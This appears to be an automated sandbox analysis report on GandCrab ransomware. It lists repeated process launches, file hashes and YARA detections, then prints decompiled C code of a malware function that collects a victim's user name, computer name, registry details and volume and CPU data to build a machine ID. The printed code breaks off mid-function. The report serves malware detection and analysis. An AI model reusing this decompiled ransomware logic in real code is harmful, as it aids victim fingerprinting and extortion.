ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 3588, Parent PID: 3528

General

Target ID:	17
Start time:	23:58:14
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000011.00000002.485870462.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000011.00000000.482554766.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 3248, Parent PID: 3528

General

Target ID:	18
Start time:	23:58:23
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000000.500809556.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000002.520951774.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 6228, Parent PID: 3528

General

Target ID:	19
Start time:	23:58:37
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000002.556440908.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000000.531056963.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000013.00000003.550407327.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 5016, Parent PID: 3528

General

Target ID:	22
Start time:	23:58:45
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000000.548829843.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000002.553896559.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 7020, Parent PID: 3528

General

Target ID:	24
Start time:	23:58:55
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000018.00000000.570376945.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000018.00000002.585796532.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000018.00000003.584737437.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 7108, Parent PID: 3528

General

Target ID:	25
Start time:	23:59:04
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000000.588245655.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000002.608744037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 204, Parent PID: 3528

General

Target ID:	26
Start time:	23:59:13
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000002.628240997.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000000.608029027.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 4804, Parent PID: 3528

General

Target ID:	30
Start time:	23:59:21
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000000.626543672.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000002.654935793.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 5952, Parent PID: 3528

General

Target ID:	31
Start time:	23:59:31
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001F.00000000.648211037.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001F.00000002.651985737.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 1784, Parent PID: 3528

General

Target ID:	32
Start time:	23:59:40
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000020.00000002.681984770.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000020.00000000.666637056.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 5076, Parent PID: 3528

General

Target ID:	33
Start time:	23:59:49
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000000.688032587.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000021.00000002.703345921.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 5700, Parent PID: 3528

General

Target ID:	34
Start time:	23:59:58
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000002.734717569.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000022.00000003.731764683.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000000.705195952.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ssapst.exePID: 972, Parent PID: 3528

General

Target ID:	35
Start time:	00:00:07
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe"
Imagebase:	0xfe60000
File size:	71680 bytes
MD5 hash:	C99BAB5FEA91C0938D1D5B6684158B24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000000.730367046.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000002.734163456.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: wThN5MTIsw.exePID: 6388, Parent PID: 4180COMMON

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	45.5%
Total number of Nodes:	714
Total number of Limit Nodes:	15

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F4E7490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F4E7490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F4E7410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F4E7410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F4E7B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F4E7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F4E7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
